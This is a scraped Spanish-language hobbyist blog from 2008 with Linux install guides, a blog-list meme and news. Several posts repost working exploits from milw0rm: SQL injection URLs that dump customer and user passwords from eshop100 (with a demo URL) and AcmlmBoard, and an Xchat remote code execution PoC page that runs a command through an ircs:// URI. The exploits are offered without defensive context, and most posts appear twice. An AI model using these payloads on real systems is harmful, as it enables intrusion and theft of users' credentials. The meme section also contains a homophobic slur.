Este es un Tipo de “meme” que vi en un sitio de por hay que trata sobre los blogs.
5 amigos cuyos blogs sin duda disfrutaría leer
1-http://gndx.org/
2-http://movimientolibre
3-http://fivenix.blogspot.com/
4-http://www.antoniomtz.org/
5-http://www.riveonline.com/
5 blogs que leería con placer morboso Y/O ociosos
1-http://www.socwall.com/
2-http://www.totallygeek.com/vscdb/index.php
3-http://linuxman.blogsome.com/
4-http://www.gnome-look.org/
5-http://art.gnome.org/
5 blogs que nunca leería
1-Uno sobre Lopez obrador
2-Uno sobre Porno Infantil
3-Uno sobre Putos -->Como el hiram y sus metroflogs
4-Uno sobre pokemon --> JAJA
5-Uno sobre Guindows --> JOJOJO
5 blogs recomendables (pues mas que nada son mis webs favoritas )
1-http://www.milw0rm.com/
2-http://packetstormsecurity.org/
3-http://www.remote-exploit.org/
4-http://www.securityfocus.com/
5-http://www.metasploit.com/
este meme se lo dejo a: GNDX Jmorales PAkO V. (cerillo) Antonio Martinez Rive bucio y a quien lo quiera contestar.
1/07/08
30/06/08
Remote SQL injection
## AUTHOR : JuDge
## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
28/06/08
video en YouTube, donde invita a descargar ilegalmente música
Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
27/06/08
Una Guia Linuxera, Para un Windolero
Hola que tal, navegando ayer por el foro de elhacker me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link
Una Guia Linuxera, Para un Windolero
Una Guia Linuxera, Para un Windolero
23/06/08
Como Instalar Back|Track 3
Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos
bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:
Entre en el archivo menu.lst de debian y lo edite
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
con eso fue mas que suficiente para tener back|track3 en mi HD.
aqui el link para descargar BACK|TRACK3
bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:
Entre en el archivo menu.lst de debian y lo edite
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
con eso fue mas que suficiente para tener back|track3 en mi HD.
aqui el link para descargar BACK|TRACK3
18/06/08
Instalar emesene
emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
haora.
#apt-get update
y haora instalamos.
#apt-get install emesene
Y listo.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
haora.
#apt-get update
y haora instalamos.
#apt-get install emesene
Y listo.
13/06/08
Xchat <= 2.8.7b Remote Code Execution
##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
Suscribirse a:
Entradas (Atom)
